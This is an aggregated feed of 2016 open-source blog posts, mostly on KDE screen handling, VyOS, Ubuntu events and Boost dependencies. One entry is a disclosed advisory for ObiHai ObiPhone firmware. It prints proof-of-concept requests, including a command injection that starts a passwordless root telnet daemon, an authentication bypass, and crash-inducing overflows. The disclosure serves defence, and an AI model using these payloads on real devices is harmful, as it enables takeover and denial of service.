August 24, 2016

hackergotchi for Ubuntu developers

Ubuntu developers

Sebastian Kügler: Multiscreen in Plasma: Improved tools and debugging

cube-small
Plasma 5.8 will be our first long-term supported release in the Plasma 5 series. We want to make this a release as polished and stable as possible. One area we weren’t quite happy with was our multi-screen user experience. While it works quite well for most of our users, there were a number of problems which made our multi-screen support sub-par.
Let’s take a step back to define what we’re talking about.

Multi-screen support means connecting more than one screen to your computer. The following use cases give good examples of the scope:

  • Static workstation A desktop computer with more than one display connected, the desktop typically spans both screens to give more screen real estate.
  • Docking station A laptop computer that is hooked up to a docking station with additional displays connected. This is a more interesting case, since different configurations may be picked depending on whether the laptop’s lid is closed or not, and how the user switches between displays.
  • Projector The computer is connected to a projector or TV.

The idea is that when the user plugs a screen in or starts up with a given configuration, and has already configured this hardware combination, that setup is restored. Otherwise, a reasonable guess is made to give the user a good starting point from which to fine-tune the setup.
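The restore-or-guess logic can be pictured with a small sketch. This is purely illustrative Python, not kscreen's actual code: the file naming, the hashing scheme, and the default layout are all assumptions for the sake of the example.

```python
import hashlib
import json
import os

def config_id(edids):
    """Derive a stable identifier for a set of connected displays.
    Illustrative only -- the real scheme lives in the kscreen daemon."""
    digest = hashlib.md5()
    for edid in sorted(edids):          # order-independent
        digest.update(edid.encode())
    return digest.hexdigest()

def restore_or_guess(edids, config_dir):
    """Return the saved layout for this display combination, or a guess."""
    path = os.path.join(config_dir, config_id(edids) + ".json")
    if os.path.exists(path):
        with open(path) as f:
            return json.load(f)          # previously fine-tuned setup
    # Reasonable default: extend to the right, primary on the first output
    return {"layout": "extend-right", "primary": sorted(edids)[0]}
```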

kcm-videowall
This is the job of KScreen. At a technical level, kscreen consists of three parts:

  • system settings module This can be reached through System Settings.
  • kscreen daemon Running as a background process, this component saves, restores and creates initial screen configurations.
  • libkscreen This is the library providing the screen setup reading and writing API. It has backends for X11, Wayland, and others, which allow clients to talk to the exact same programming interface, independent of the display server in use.

At an architectural level, this is a sound design: the roles are clearly separated, the low-level bits are suitably abstracted to allow re-use of code, the API presents what matters to the user, implementation details are hidden. Most importantly, aside from a few bugs, it works as expected, and in principle, there’s no reason why it shouldn’t.

So much for the theory. In reality, we’re dealing with a huge amount of complexity. There are hardware events such as suspending and waking up with a different configuration; the laptop’s lid may be closed or opened (and when that happens, we don’t even get an event that it closed); displays come and go; depending on their connection, the same piece of hardware might support completely different resolutions; hardware comes with broken EDID information; display connectors come and go, and so do display controllers (crtcs). On top of all that, the only way we get to know what actually works in reality for the user is the “throw stuff against the wall and observe what sticks” tactic.

This is the fabric of nightmares. Since I prefer to not sleep, but hack at night, I seemed to be the right person to send into this battle. (Coincidentally, I was also “crowned” kscreen maintainer a few months ago, but let’s stick to drama here.)

So, anyway, as I already mentioned in an earlier blog entry, we had some problems restoring configurations. In certain situations, displays weren’t enabled or were positioned unreliably, or kscreen failed to restore configurations altogether, making it “forget” settings.
kscreen-doctor

Better tools

Debugging these issues is not entirely trivial. We need to figure out at which level they happen (for example in our xrandr implementation, in other parts of the library, or in the daemon). We also need to figure out what exactly happens, and when it does. A complex architecture like this brings a number of synchronization problems with it, and these are hard to debug when you have to piece together what exactly goes on across log files. In Plasma 5.8, kscreen will log its activity into one consolidated, categorized and time-stamped log. This rather simple change has already been a huge help in getting to know what’s really going on, and it has helped us identify a number of problems.
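To picture what such a consolidated, categorized, time-stamped log looks like, here is a generic sketch in Python. kscreen itself uses Qt's logging categories rather than anything like this, and the category names below are made up:

```python
import logging

# One consolidated log; every record is tagged with a category and a
# timestamp, so events from the backend and the daemon interleave in order.
logging.basicConfig(
    format="%(asctime)s [%(name)s] %(message)s",
    level=logging.DEBUG,
)

backend = logging.getLogger("kscreen.xrandr")   # hypothetical category
daemon = logging.getLogger("kscreen.kded")      # hypothetical category

backend.debug("output HDMI-2 connected, preferred mode 1920x1080")
daemon.debug("restoring saved configuration for 2 outputs")
```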

A tool which I’ve been working on is kscreen-doctor. On the one hand, I needed a debugging helper tool that can give system information useful for debugging. Perhaps more importantly, I knew I’d be missing a command-line tool to futz around with screen configurations from the command line or from scripts as Wayland arrives. kscreen-doctor allows changing the screen configuration at runtime, like this:

Disable the hdmi output, enable the laptop panel and set it to a specific mode
$ kscreen-doctor output.HDMI-2.disable output.eDP-1.mode.1 output.eDP-1.enable

Position the hdmi monitor on the right of the laptop panel
$ kscreen-doctor output.HDMI-2.position.0,1280 output.eDP-1.position.0,0
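Since one stated goal is driving configurations from scripts, wrapping kscreen-doctor could look roughly like this. A hedged Python sketch: it simply mirrors the positioning example above, and assumes kscreen-doctor is on your PATH and that your outputs really are named HDMI-2 and eDP-1:

```python
import subprocess

def doctor_args(external="HDMI-2", laptop="eDP-1", offset=1280):
    """Build the kscreen-doctor invocation from the example above.
    Output names are whatever your own hardware reports."""
    return [
        "kscreen-doctor",
        f"output.{external}.position.0,{offset}",
        f"output.{laptop}.position.0,0",
    ]

def apply(args):
    # Requires kscreen-doctor (Plasma 5.8+); experimental, so it may fail.
    return subprocess.run(args, check=True)
```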

Please note that kscreen-doctor is quite experimental. It’s a tool that allows you to shoot yourself in the foot, so user discretion is advised. If you break things, you get to keep the pieces. I’d like to develop this into a more stable tool in kscreen, but for now: don’t complain if it doesn’t work or eats your hamster.

Another neat testing tool is Wayland. The video wall configuration you see in the screenshot is unfortunately not real hardware I have around here. What I’ve done instead is run a Wayland server with these “virtual displays” connected, which in turn allowed me to reproduce a configuration issue. I’ll spare you the details of what exactly went wrong, but this kind of trick allows us to reproduce problems with much more hardware than I ever want or need in my office. It doesn’t stop there: I’ve added this hardware configuration to our unit-testing suite, so we can make sure that this case is covered and keeps working in the future.

24 August, 2016 01:16PM

August 23, 2016

Aaron Honeycutt: Razer Hardware on Linux

One of the things that stopped me from moving to Ubuntu Linux full time on my desktop was the lack of support for my Razer Blackwidow Chroma. For those who do not know about it: pretty link. It is a very pretty keyboard with every key programmable to be a different color or effect. I found a super cool program on GitHub to make it work on Ubuntu/Linux Mint, Debian, and possibly a few others, since the source is available here: source link

Here is what the application looks like:
polychromatic-ss1

It even has a tray applet to change the colors and effects quickly.

23 August, 2016 08:40PM

hackergotchi for VyOS

VyOS

vyos.net → wiki.vyos.net redirect

You may have noticed (or will notice soon) that http://vyos.net redirects to http://wiki.vyos.net. Don't worry, this is normal.

It's the first step in preparation to roll out the new website. When it goes live, the vyos.net and vyos.io domains will point to the new website, and the wiki will live on its own wiki.vyos.(net|io) domain.

Meanwhile you can view the future website at http://vyos.io/ and give us your feedback, if you haven't already.


23 August, 2016 08:04PM

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Webinar: Industry 4.0 & IoT

Webinar 3 - CloudPlugs

We’ll be hosting our next webinar on Industry 4.0 and IoT!

This webinar will explore the convergence of Operational and Information technology as one of the key benefits of the Internet of Things; and how to use this convergence as a way to build a new generation of integrated digital supply chains which are the base of Industry 4.0.

The webinar will cover the following topics:

  • Industry 4.0 and IoT Trends
  • Higher efficiency and productivity through end to end integrated digital supply chains
  • New business opportunities for all players in the manufacturing supply chain
  • Real life examples on industrial process improvements through the use of IoT

Sign-up here

About the speaker: Jimmy Garcia-Meza is the co-founder and CEO of CloudPlugs Inc. He has over 20 years of experience running startups and large divisions in private and public U.S. multinational companies. He co-founded nubisio, Inc., a cloud storage company acquired by Bain Capital. He was CEO of FilesX, a backup software company acquired by IBM. He held various executive positions at Silicon Image (SIMG), where he was responsible for driving the world-wide adoption of HDMI. He was a venture director at Index Ventures and held several executive positions at Sun Microsystems, where he was in charge of a $1.7B global line of business.

23 August, 2016 03:38PM

Ubuntu Insights: M10 Travel Light winners!

140_M10_TravelLight_Comp_v02_#TravelLight (3)

We had an awesome selection of entries for our #TravelLight competition!

Given that the M10 tablet can also be your laptop, saving you 1.5kg compared to the average laptop, we asked you…

What would you take with you on holiday if you had 1.5kg of extra space in your luggage?

Thank you to all those who participated; we had a laugh reading them! It wasn’t easy, but we narrowed down our winners to the following:

Primary winners (Prize: M10 Tablet)

Gabriel Lucas

Andrea Souviron

Other winners (Prize: Strauss bluetooth speaker)

Adnan Quaium

Zakaria Bouzid

Bouslikhin saad

Johnny Chin

Bruce Cozine

Learn about the M10

23 August, 2016 03:19PM

Jono Bacon: Bacon Roundup – 23rd August 2016

Well, hello there, people. I am back with another Bacon Roundup which summarizes some of the various things I have published recently. Don’t forget to subscribe to get the latest posts right to your inbox.

Also, don’t forget that I am doing a Reddit AMA (Ask Me Anything) on Tues 30th August 2016 at 9am Pacific. Find out the details here.

Without further ado, the roundup:

Building a Career in Open Source (opensource.com)
A piece I wrote about how to build a successful career in open source. It delves into finding opportunity, building a network, always learning/evolving, and more. If you aspire to work in open source, be sure to check it out.

Cutting the Cord With Playstation Vue (jonobacon.org)
At home we recently severed ties with DirecTV (for lots of reasons, this being one), and moved our entertainment to a Playstation 4 and Playstation Vue for TV. Here’s how I did it, how it works, and how you can get in on the action.

Running a Hackathon for Security Hackers (jonobacon.org)
I have been working with HackerOne, and we recently ran a hackathon for some of the best hackers in the world to hack popular products and services for fun and profit. Here’s what happened, how it looked, and what went down.

Opening Up Data Science with data.world (jonobacon.org)
Recently I have also been working with data.world who are building a global platform and community for data, collaboration, and insights. This piece delves into the importance of data, the potential for data.world, and what the future might hold for a true data community.

From The Archive

To round out this roundup, here are a few pieces I published from the archive. As usual, you can find more here.

Using behavioral patterns to build awesome communities (opensource.com)
Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These traits can provide a helpful foundation on which we build human systems and communities. This piece delves into some practical ways in which you can harness behavioral economics in your community or organization.

Atom: My New Favorite Code Editor (jonobacon.org)
Atom is an extensible text editor that provides a thin and sleek core and a raft of community-developed plugins for expanding it into the editor you want. Want it like vim? No worries. Want it like Eclipse? No worries. Here’s my piece on why it is neat and recommendations for which plugins you should install.

Ultimate unconference survival guide (opensource.com)
Unconferences, for those who are new to them, are conferences in which the attendees define the content on the fly. They provide a phenomenal way to bring fresh ideas to the surface. They can, though, be a little complicated for attendees to figure out. Here are some tips on getting the most out of them.

Stay up to date and get the latest posts direct to your email inbox with no spam and no nonsense. Click here to subscribe.

The post Bacon Roundup – 23rd August 2016 appeared first on Jono Bacon.

23 August, 2016 01:48PM

hackergotchi for VyOS

VyOS

VyOS Project news

Hello, Community!

We have some great news to share! 

As some of you may already know, we are planning to run a virtual meeting event for VyOS developers and users in the near future.

So in case you want to participate, just fill out this form and, of course, join us on our development portal to stay in touch.

We must admit that this summer has been productive in all aspects:

Tremendous work towards VyOS 1.2 has been done, and we are going to present the 1.2.0 beta 2 in a few weeks! Thanks to our super team!

We revived the OVA distribution of VyOS some months ago and have continued working towards extensive VMware platform support; we also plan to deliver supported images for all other standard hypervisors, like KVM and MS Hyper-V, and VyOS on cloud marketplaces for AWS, Azure, and GCE.

VyOS is now available on the SolidRun ClearFog device; credit for this great work goes to UnicronNL. This opens up new applications for VyOS.

Ansible, starting from version 2.2, is able to configure VyOS, so if you use Ansible, give it a try! We, in turn, are working on a standalone management library for Python.

We receive many requests regarding a GUI, and yes, we are listening. Over the last four months we have dedicated a lot of time to studying possible ways of delivering such a UI. Apart from the technical challenges, there are other problems to take into account (service providers don't want a GUI, while SMBs and ROBOs show high demand). We are working to satisfy all users without sacrifices on either side. So basically yes, there will be a GUI in the near future, but there is no ETA for now.

We believe that an affordable open source routing platform and NFV should be accessible to everyone out there.

Want to participate?

Join us on social networks and spread the word about VyOS - Twitter, Reddit, Facebook, Google+, LinkedIn

Participate in discussions on the forum and of course join us on the development portal

VyOS is a community-driven, Linux-based network operating system for routers and firewalls.

Saludos,

Yuriy

23 August, 2016 07:14AM by Yuriy Andamasov

August 22, 2016

hackergotchi for Ubuntu developers

Ubuntu developers

Elizabeth K. Joseph: Ubuntu in Philadelphia

Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.

But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I also was able to give away a copy of our The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu.

Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.

Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.

Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long time LoCo member Randy Gold.

They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that.


Thanks to Randy for the booth photo!

At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them and since both José and I attended the conference, the raffle winners had 2/3 of the authors there to sign the books.


My co-author, José Antonio Rey, signing a copy of our book!

22 August, 2016 07:53PM

hackergotchi for ArcheOS

ArcheOS

St. Paolina Visintainer. Recovering a lost smile

On Thursday 9th June 2016, a conference was held in Vigolo Vattaro (Trentino, Italy) regarding the figure of St. Paolina Visintainer, who was born in this town in 1865, and, more generally, the issue of immigration.
Among the other interesting contributions, a special mention has to be made for the work on Italian immigration to Brazil during the XIX century, presented by Cesar Augusto Prezzi, which focused on the states of Rio Grande do Sul and Santa Catarina. This research illustrated the hard journey Italian and, in general, European migrants had to face to reach the New World, often losing their relatives along the way (in many cases buried at sea), in order to escape poverty and war (a story that sadly recalls the current journeys of refugees).


Ship with immigrants in Santos

Our (Arc-Team) contribution to the conference concerned a more particular topic connected with the person of St. Paolina: her forensic facial reconstruction, aimed at recovering her smile. Indeed, Mother Paolina is remembered as a smiling and good-natured person, but, since the only photos we have were taken in sad moments of her life, we have no representation of her more natural expression. Starting from this singular issue, +Cícero Moraes began working to recover her lost smile, with the help of the artist Mari Bueno and Prof. José Luis Lira.
Below I have uploaded the video of the presentation I gave during the conference, which presents the partners of the project, the main workflow, and the final result:



while here is the clip shown in the final part of the slides:




Have a nice day!

22 August, 2016 03:48PM by Luca Bezzi (noreply@blogger.com)

hackergotchi for SparkyLinux

SparkyLinux

Enlightenment 0.21.2

 

There is an update of Enlightenment 0.21.2 ready in Sparky repository now.

Upgrade as usual:
sudo apt-get update
sudo apt-get dist-upgrade

If you would like to make fresh installations, run:
sudo apt-get update
sudo apt-get install enlightenment

The present version of Enlightenment 0.21.2 uses EFL 1.18 and Python-EFL 1.18 (both available in our repos).

The ’emotion-generic-players’, ‘evas-generic-loaders’ and ‘elementary’ packages have been removed from Sparky repos already.

 

22 August, 2016 11:40AM by pavroo

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: QTS and Canonical unveil private, fully managed OpenStack cloud

QTS-export

OVERLAND PARK, KANSAS, and LONDON, U.K. (August 22, 2016) – Responding to increasing demand for flexible, open source and cost-predictable cloud solutions, QTS Realty Trust, Inc. (NYSE: QTS) and Canonical (the company behind Ubuntu, the leading operating system for container cloud, scale out, and hyperscale computing) announced today a private, fully managed OpenStack cloud solution available from any of QTS’ geographically diverse and highly secure data centers in mid-September.

Built on Ubuntu OpenStack, the world’s most popular OpenStack distribution, and using Canonical’s application modeling service Juju as well as Canonical’s bare-metal provisioning tool MAAS (Metal as a Service), QTS’ private, fully managed OpenStack cloud enables enterprise customers to perform quick and easy provisioning, orchestration, and management of cloud resources. Examples include:

  • Building software-as-a-service applications, either as new developments or as improvements upon existing solutions.
  • Serving as a base for delivering self-service storage and service on demand to users who need IT services.
  • Delivering object storage or block storage on demand.
  • Saving on licensing fees associated with virtualization technologies.

In addition to the private cloud offering, QTS offers a public, multi-tenant, pay-as-you-go OpenStack cloud solution that is self-provisioning, elastic and highly scalable.

“As a leading data center and IT infrastructure services provider, QTS is focused on delivering seamless hybrid cloud hosting solutions using proven, best-in-breed platform technologies,” said Anand Krishnan, Executive Vice President, Canonical Cloud. “We are pleased to support QTS’ delivery of OpenStack solutions that combine the rapid availability and elasticity of compute resources with the security and control their enterprise customers demand to support their mission critical applications and workloads.”

The new OpenStack solution is an important addition to QTS’ expanding portfolio of scalable, secure and compliant IaaS solutions and complements other QTS’ purpose-built clouds serving public sector, healthcare and enterprise workloads.

“QTS OpenStack Cloud is the latest addition as we expand our Infrastructure-as-a-Service (IaaS) offerings to create a one-stop shop for flexible IaaS and hybrid IT solutions that address increasingly diverse customer requirements,” said Jon Greaves, Chief Technology Officer, QTS. “Canonical is an industry leader in OpenStack management and technologies and we look forward to working closely as we unleash OpenStack Cloud solutions across our geographically diverse platform of integrated data centers.”

The fully managed cloud solution is being previewed at OpenStack East in New York City August 23-24 at Canonical booth # H12.

22 August, 2016 09:00AM

David Tomaschik: ObiHai ObiPhone: Multiple Vulnerabilties

Note that this is a duplicate of the advisory sent to the full-disclosure mailing list.

Introduction

Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The vulnerabilities were discovered during a black-box security assessment, and therefore the vulnerability list should not be considered exhaustive.

Affected Devices and Versions

ObiPhone 1032/1062 with firmware less than 5-0-0-3497.

Vulnerability Overview

Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

Vulnerability Details

Obi-1. Memory corruption leading to free() of an attacker-controlled address

By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free(). By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application. Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault.

python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479d8b18 in free () from root/lib/libc.so.6
#1  0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>:        ldr     r3, [r0, #-4]
   0x479d8b1c <free+52>:        sub     r5, r0, #8
   0x479d8b20 <free+56>:        tst     r3, #2
   0x479d8b24 <free+60>:        bne     0x479d8bec <free+260>
   0x479d8b28 <free+64>:        tst     r3, #4
(gdb) i r r0
r0             0x41     65

Obi-2. Command injection in WiFi Config

An authenticated user (including the lower-privileged “user” user) can enter a hidden network name similar to “$(/usr/sbin/telnetd &)”, which starts the telnet daemon.

GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]

Note that telnetd is now running and accessible via user “root” with no password.

Obi-3. Denial of Service due to buffer overflow

By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash. Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process. strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test.

python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479dc440 in strcpy () from root/lib/libc.so.6
#1  0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
   0x479dc44c <strcspn>:        push    {r4, r5, r6, lr}
   0x479dc450 <strcspn+4>:      ldrb    r3, [r0]
(gdb) i r r1 r2
r1             0xb434df01       3023363841
r2             0xff     255
(gdb) p/x $r1+$r2
$1 = 0xb434e000

Obi-4. Buffer overflow in internal socket handler

Commands to be executed by realtime backend process obid are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack. This string can overflow the static buffer, leading to control of program flow. The only vectors leading to this code that were discovered during the assessment were authenticated, however unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged “user” user.

GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]

(gdb) 
#0  0x41414140 in ?? ()
#1  0x0006dc78 in ?? ()

Obi-5. Cross-site request forgery

All portions of the web interface appear to lack any protection against Cross-Site Request Forgery. Combined with the command injection vector in Obi-2, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the current browser session was logged in to the phone.

Obi-6. Failure to implement RFC 2617 correctly

RFC 2617 specifies HTTP digest authentication, but is not correctly implemented on the ObiPhone. The HTTP digest authentication fails to comply in the following ways:

  • The URI is not validated
  • The application does not verify that the nonce received is the one it sent
  • The application does not verify that the nc value does not repeat or go backwards

    GET / HTTP/1.1
    Host: foo
    Authorization: Digest username="admin", realm="a", nonce="a", uri="/",
      algorithm=MD5, response="309091eb609a937358a848ff817b231c", opaque="",
      qop=auth, nc=00000001, cnonce="a"
    Connection: close

    HTTP/1.1 200 OK
    Server: OBi110
    Cache-Control: must-revalidate, no-store, no-cache
    Content-Type: text/html
    Content-Length: 1108
    Connection: close

Please note that the realm, nonce, cnonce, and nc values have all been chosen and the response generated offline.
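Computing such a response offline is straightforward, which is the crux of the issue: with the realm, nonce, nc, and cnonce all attacker-chosen, only the credentials are needed. A sketch of the RFC 2617 qop=auth calculation (the password below is a placeholder; the advisory does not disclose the device's credentials):

```python
import hashlib

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def digest_response(user, password, realm, nonce, nc, cnonce, method, uri):
    """RFC 2617 response with qop=auth and algorithm=MD5. Every input
    except the password is client-chosen here, which is exactly why the
    server must validate the nonce, nc, and uri itself."""
    ha1 = md5_hex(f"{user}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:auth:{ha2}")

# Values mirror the request above; "secret" is a placeholder password.
resp = digest_response("admin", "secret", "a", "a", "00000001", "a", "GET", "/")
```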

Obi-7. Invalid pointer dereference due to invalid header

Sending an invalid HTTP Authorization header, such as “Authorization: foo”, causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device. This requires no authentication, only access to the network to which the device is connected.

GET / HTTP/1.1
Host: foo
Authorization: foo

This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code.

(gdb) bt
#0  0x479dc438 in strcpy () from root/lib/libc.so.6
#1  0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>:       ldrb    r3, [r1, #1]!
   0x479dc43c <strcpy+12>:      cmp     r3, #0
   0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
(gdb) i r r1
r1             0xffffffff       4294967295

Obi-8. Null pointer dereference due to malicious URL

If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone. This requires no authentication, only access to the network to which the device is connected.

GET /obihai-xml HTTP/1.1
Host: foo

(gdb) bt
#0  0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args: 
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>:       ldr     r2, [r1], #4
   0x479dc7f8 <strlen+8>:       ands    r3, r0, #3
   0x479dc7fc <strlen+12>:      rsb     r0, r3, #0
   0x479dc800 <strlen+16>:      beq     0x479dc818 <strlen+40>
   0x479dc804 <strlen+20>:      orr     r2, r2, #255    ; 0xff
(gdb) i r r1
r1             0x0      0

Obi-9. Denial of service due to invalid content-length

Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution. Larger (more negative) values return a page stating “Firmware Update Failed” though it does not appear any attempt to update the firmware with the posted data occurred.

POST / HTTP/1.1
Host: foo
Content-Length: -1

Foo

This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application.

(gdb) bt
#0  0x00138250 in HTTPD_msg_proc ()
#1  0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>:       strb    r1, [r3, r2]
  0x138254 <HTTPD_msg_proc+400>:       ldr     r1, [r4, #24]
  0x138258 <HTTPD_msg_proc+404>:       ldr     r0, [r4, #88]   ; 0x58
  0x13825c <HTTPD_msg_proc+408>:       bl      0x135a98
  0x138260 <HTTPD_msg_proc+412>:       ldr     r0, [r4, #88]   ; 0x58
(gdb) i r r3 r2
r3             0xafcc7000       2949410816
r2             0xffffffff       4294967295

Mitigation

Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.

Author

The issues were discovered by David Tomaschik of the Google Security Team.

Timeline

  • 2016/05/12 - Reported to ObiHai
  • 2016/05/12 - Findings Acknowledged by ObiHai
  • 2016/05/20 - ObiHai reports working on patches for most issues
  • 2016/06/?? - New Firmware posted to ObiHai Website
  • 2016/08/18 - Public Disclosure

22 August, 2016 07:00AM

Paul Tagliamonte: go-wmata - golang bindings to the DC metro system

A few weeks ago, I hacked up go-wmata, some golang bindings to the WMATA API. This is super handy if you are in the DC area, and want to interface to the WMATA data.

As a proof of concept, I wrote a yo bot called @WMATA, where it returns the closest station if you Yo it your location. For hilarity, feel free to Yo it from outside DC.

For added fun, and puns, I wrote a dbus proxy for the API as well, at wmata-dbus, so you can query the next train over dbus. One thought was to make a GNOME Shell extension to tell me when the next train is. I’d love help with this (or pointers on how to learn how to do this right).

22 August, 2016 02:16AM

August 21, 2016

Stephen Kelly: Boost dependencies and bcp

Recently I generated diagrams showing the header dependencies between Boost libraries, or rather, between various Boost git repositories. Diagrams showing dependencies for each individual Boost git repo are here along with dot files for generating the images.

The monster diagram is here:

Edges and Incidental Modules and Packages

The directed edges in the graphs represent that a header file in one repository #includes a header file in the other repository. The idea is that, if a packager wants to package up a Boost repo, they can’t assume anything about how the user will use it. A user of Boost.ICL can choose whether ICL will use Boost.Container or not by manipulating the ICL_USE_BOOST_MOVE_IMPLEMENTATION preprocessor macro. So, the packager has to list Boost.Container as some kind of dependency of Boost.ICL, so that when the package manager downloads the boost-icl package, the boost-container package is automatically downloaded too. The dependency relationship might be a ‘suggests’ or ‘recommends’, but the edge will nonetheless exist somehow.

In practice, packagers do not split Boost into packages like that. At least for debian packages they split compiled static libraries into packages such as libboost-serialization1.58, and put all the headers (all header-only libraries) into a single package libboost1.58-dev. Perhaps the reason for packagers putting it all together is that there is little value in splitting the header-only repository content in the monolithic Boost from each other if it will all be packaged anyway. Or perhaps the sheer number of repositories makes splitting impractical. This is in contrast to KDE Frameworks, which does consider such edges and dependency graph size when determining where functionality belongs. Typically KDE aims to define the core functionality of a library on its own in a loosely coupled way with few dependencies, and then add integration and extension for other types in higher level libraries (if at all).

Another feature of my diagrams is that repositories which depend circularly on each other are grouped together in what I called ‘incidental modules‘. The name is inspired by ‘incidental data structures’ which Sean Parent describes in detail in one of his ‘Better Code’ talks. From a packager point of view, the Boost.MPL repo and the Boost.Utility repo are indivisible because at least one header of each repo includes at least one header of the other. That is, even if packagers wanted to split Boost headers in some way, the ‘incidental modules’ would still have to be grouped together into larger packages.

As far as I am aware such circular dependencies don’t fit with Standard C++ Modules designs or the design of Clang Modules, but that part of C++ would have to become more widespread before Boost would consider their impact. There may be no reason to attempt to break these ‘incidental modules’ apart if all that would do is make some graphs nicer, and it wouldn’t affect how Boost is packaged.

My script for generating the dependency information is simply grepping through the include/ directory of each repository and recording the #included files in other repositories. This means that while we know Boost.Hana can be used stand-alone, if a packager simply packages up the include/boost/hana directory, the result will have dependencies on parts of Boost because Hana includes code for integration with existing Boost code.
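A rough sketch of that kind of grep-based scan, run here against a toy repository layout – the paths and output format are illustrative assumptions, not the author's actual script:

```shell
# Create a toy repo layout to scan (illustrative only).
mkdir -p demo/icl/include/boost/icl
cat > demo/icl/include/boost/icl/ptime.hpp <<'EOF'
#include <boost/date_time/posix_time/posix_time.hpp>
EOF

# For one repo, list the Boost repos its headers #include
# (in real use you would filter out the repo's own name).
deps=$(grep -rho '#include <boost/[a-z_0-9]*' demo/icl/include \
       | sed 's|.*<boost/||' | sort -u)
echo "$deps"   # prints "date_time"
```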

Dependency Analysis and Reduction

One way of defining a Boost library is to consider the group of headers which are gathered together and documented together to be a library (there are other ways, which some in Boost prefer – it is surprisingly fuzzy). That is useful for documentation at least, but as shown above it appears not to be useful from a packaging point of view. So, are these diagrams useful for anything?

